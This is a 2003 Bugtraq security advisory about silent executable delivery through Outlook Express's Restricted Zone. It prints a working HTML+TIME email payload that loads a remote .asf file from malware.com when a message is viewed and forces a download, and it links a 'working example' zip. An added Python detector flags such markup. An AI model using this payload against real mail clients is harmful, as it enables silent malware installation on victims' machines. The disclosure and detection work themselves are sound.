Open Source and information security mailing list archives
Message-ID: <200305211155.h4LBtYrp029829@web179.megawebservers.com>
Date: Wed, 21 May 2003 11:55:34 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>, <NTBugtraq@...tserv.ntbugtraq.com>
Subject: Restricted Zone: the OUTLOOK EXPRESS
Tuesday, 20 May, 2003


Silent delivery and installation of an executable on a target 
computer. No client input other than opening an email or newsgroup 
post.

This can be achieved with the default setting of Outlook Express: 
RESTRICTED ZONE.

Technically the following never worked, cannot work, shouldn't work. 
But it does:

MIME-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: 7bit
X-Source: 05.19.03  http://www..malware.com 

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://www.malware.com/freek.asf"  />
</body></html>

What that does is invoke our freakish media file including our trusty 
and battle-hardened 0s URL flip from within the html of an email or 
newsgroup post on viewing, which ordinarily could never be done.

But it now appears that while custom-crafted media files fail, 
modified third-party files [whatever that means] function according 
to plan. Specifically audio + *.asf. Our 0s URL flip points to our 
file on the remote server and automatically forces our download as 
instructed. Couple that with the most recent flood-like functionality 
of the iframe: http://www.securityfocus.com/archive/1/321662 and 
that's the end of that.
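The delivery vector above is an HTML body that declares the `t` namespace, binds it to the `#default#time` (HTML+TIME) behavior and then names a media file in a `t:audio` element, so that viewing the message alone hands the file to the media player. The following checker is an added example, not code from the advisory or from malware.com: it pulls every text/html part out of a raw message and reports HTML+TIME media elements together with the URL they point at, which is the thing a mail gateway or a triage script would want to flag. The sample message and the `example.invalid` URL are constructed for the example.

```python
import email
import re
from email import policy

# Constructed message in the shape of the advisory's payload (not the original).
SAMPLE_MESSAGE = r"""MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Subject: constructed sample

<html xmlns:t>
<head><style>
t\:*{behavior:url(#default#time);display:none}</style></head><body>
<t:audio  t:src="http://example.invalid/sample.asf"  />
</body></html>
"""

# Constructed benign HTML message, for the negative case.
BENIGN_MESSAGE = """MIME-Version: 1.0
Content-Type: text/html
Subject: constructed benign sample

<html><body><p>Meeting moved to 3pm.</p></body></html>
"""

# CSS binding of the HTML+TIME behavior (the "time2" variant is the later IE release).
TIME_BEHAVIOR = re.compile(r"behavior\s*:\s*url\(\s*#default#time2?\s*\)", re.I)
# HTML+TIME media elements: <t:audio ...>, <t:video ...>, <t:media ...>, with src or t:src.
TIME_MEDIA = re.compile(
    r"<\s*t:(audio|video|media)\b[^>]*?\b(?:t:)?src\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def find_html_time_media(raw_message: str) -> list:
    """Return (element, url) pairs for HTML+TIME media elements found in the
    text/html parts of a raw RFC 822 message; an empty list means no hit."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():  # single-part messages yield themselves
        if part.get_content_type() != "text/html":
            continue
        html = part.get_content()
        # Only bodies that wire up the time behavior (or declare the t namespace)
        # can make a t:* element do anything, so skip everything else cheaply.
        if not TIME_BEHAVIOR.search(html) and "xmlns:t" not in html.lower():
            continue
        for m in TIME_MEDIA.finditer(html):
            hits.append((m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    print(find_html_time_media(SAMPLE_MESSAGE))  # [('audio', 'http://example.invalid/sample.asf')]
    print(find_html_time_media(BENIGN_MESSAGE))  # []
```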

Tested on:

Outlook Express 6.00.2800.1123 and all of its 'patches'
with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]

First Step Working Example:

http://www.malware.com/but.its.free.zip


Notes:

1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora 
WebBrowser Control Embedded Media Player File Vulnerability': 
http://www.securityfocus.com/bid/4343 which appears to never have 
been patched.

2. disable scripting in the media player [if it helps]

3. do not be lured into opening email and newsgroup posts from 
untrustworthy sources


End Call


-- 
http://www.malware.com